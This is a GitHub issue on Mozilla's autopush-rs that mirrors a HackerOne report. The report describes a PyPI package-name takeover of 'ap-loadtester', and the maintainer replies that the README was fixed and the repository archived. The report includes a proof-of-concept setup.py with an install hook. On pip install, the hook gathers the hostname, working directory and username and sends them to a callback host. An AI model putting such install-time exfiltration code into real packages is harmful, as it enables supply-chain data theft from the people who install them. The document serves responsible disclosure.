search

mozilla-services / autopush-rs

Push Server in Rust
Mozilla Public License 2.0
189 stars 15 forks source link

code injection through pip #418

Open data-sync-user opened 11 months ago

data-sync-user commented 11 months ago

HackerOne Report: https://hackerone.com/reports/2097694 Report Date: 2023-08-05 17:06:15 UTC Reporter: anupamas01 Weakness: Code Injection

Initial Report: {panel}

Summary:

hello team, I found a pip package by which I can run malicious commands.

Steps To Reproduce:

[add details for how we can reproduce the issue]

  1. go to https://github.com/mozilla-services/autopush-loadtester ( as it is highly been used i have not uploaded a higher version which may affect the production)
  2. you can see $ pip install ap-loadtester, you can see I have taken it over https://pypi.org/project/ap-loadtester/ (in Maintainers)\ when you install it, it will install my pip package

POC

https://pypi.org/project/ap-loadtester/

( right now I am not uploading any code , if program allows i will upload )

from setuptools.command.install import install
import requests
import socket
import getpass
import os
class CustomInstall(install):
    def run(self):
        install.run(self)
        hostname=socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        ploads = {'hostname':hostname,'cwd':cwd,'username':username}
        requests.get("[https://burpcollaborator.net",params](https://burpcollaborator.net",params)
 = ploads) #replace burpcollaborator.net with Interactsh or pipedream
setup(name=ap-loadtester, #package name
      version='1.0.0',
      description='test',
      author='test',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

POC

https://pypi.org/project/ap-loadtester/

Impact

code injection through the pip package

thanks AnupamAs01



{panel}

┆Issue is synchronized with this [Jira Bug](https://mozilla-hub.atlassian.net/browse/SYNC-3860)
┆Attachments: <a href="https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617">[F2576644] image.png</a>
jrconlin commented 11 months ago

Thank you for reporting this!

The repo you site autopush-loadtester is a very old test script for the original autopush repo which has been replaced by this repo. It was never meant to be installed by pip (and clearly so, because the setup.py would have created a different named repo anyway. 🤦🏻‍♂️ )
I've corrected the README on the autopush-loadtester repo to remove references to ap-loadtester, as well as archived the repo.

Clearly, there are a lot of old bits and pieces lying around that have not yet been cleaned up properly. Thank you for helping us find one.